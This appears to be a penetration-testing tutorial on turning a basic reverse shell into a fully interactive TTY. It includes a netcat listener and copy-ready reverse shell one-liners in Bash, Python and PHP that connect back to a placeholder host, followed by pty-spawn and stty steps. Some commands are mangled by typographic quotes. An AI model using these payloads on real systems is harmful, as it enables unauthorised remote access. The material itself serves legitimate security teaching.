This article will teach you how to upgrade your TTY shell from a reverse connection.
TL;DR
I’m too lazy to read the article, just give me the commands…
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty rows
stty raw -echo;fg
reset
xterm
export TERM=xterm
stty rows 19 columns 125— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Using this method will allow you to get a full TTY shell with the ability to use Ctrl +c, auto-complete, and much more.
Getting a reverse shell
To get the initial reverse shell connection you can use these simple techniques below.
Setup a listener
I prefer to use a simple netcat client whilst working in Kali. You can enter these commands to get the listener set up on your machine.
nc -lnvp 9999nc = netcat executable
l = listen for a connection
n = no dns
v = verbose output
p = source port9999 being the source port.
Spawn a reverse connection
This can be done many ways, below are a few common ways to get a quick shell from a system.
*replace <YOUR_IP> and <YOUR_PORT> with your ip and port, eg: 127.0.0.1 9999
Bash
bash -i >& /dev/tcp/<YOUR_IP>/<YOUR_PORT> 0>&1Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR_IP>",<YOUR_PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'*you can use “python” or “python3” if available on the system
Php
php -r '$sock=fsockopen("<YOUR_IP>",<YOUR_PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'More ways to get a reverse shell can be seen here
Upgrading to a full shell
Now you have a connection and a basic (dumb) shell. Its time to upgrade it!
After you get your connection back, we first need to get a tty shell spawned.
Below are a few ways to do so, I always prefer if I can the python version.
Python (my preferred)
python -c ‘import pty; pty.spawn("/bin/bash")’
or
python3 -c ‘import pty; pty.spawn("/bin/bash")’Bash
echo os.system(‘/bin/bash’)Sh
/bin/sh -iPerl
perl — e ‘exec “/bin/sh”;’exec “/bin/sh”;Ruby
exec “/bin/sh”Lua
os.execute(‘/bin/sh’)
*Tip: If you copy and paste these commands, replace “ with your own as formatting here will mess up your command.
Step 1
Spawn pty using one of the above commands.
Step 2
Press Ctrl+z to “background” your current tty session.
Enter
stty sizeThen note down your terminal size.
Now enter the next command to foreground the terminal and then reset it.
stty raw -echo;fg
Now type “reset” as you can see this will be off slightly.
Hit enter again and the shell will return to you.
Step 3
Export the term and shell environment next.
Commands
export TERM=xterm-256color
or use
export TERM=xtermexport SHELL=bash
Now Ctrl+c won’t kill your terminal but wait there’s one more step.
Add the correct size back to your terminal with the below command.
stty rows 19 columns 125- enter the size you got from your terminal.
Congratulations!! You now have a fully interactive shell!
Happy cybersecurity penetration testing!
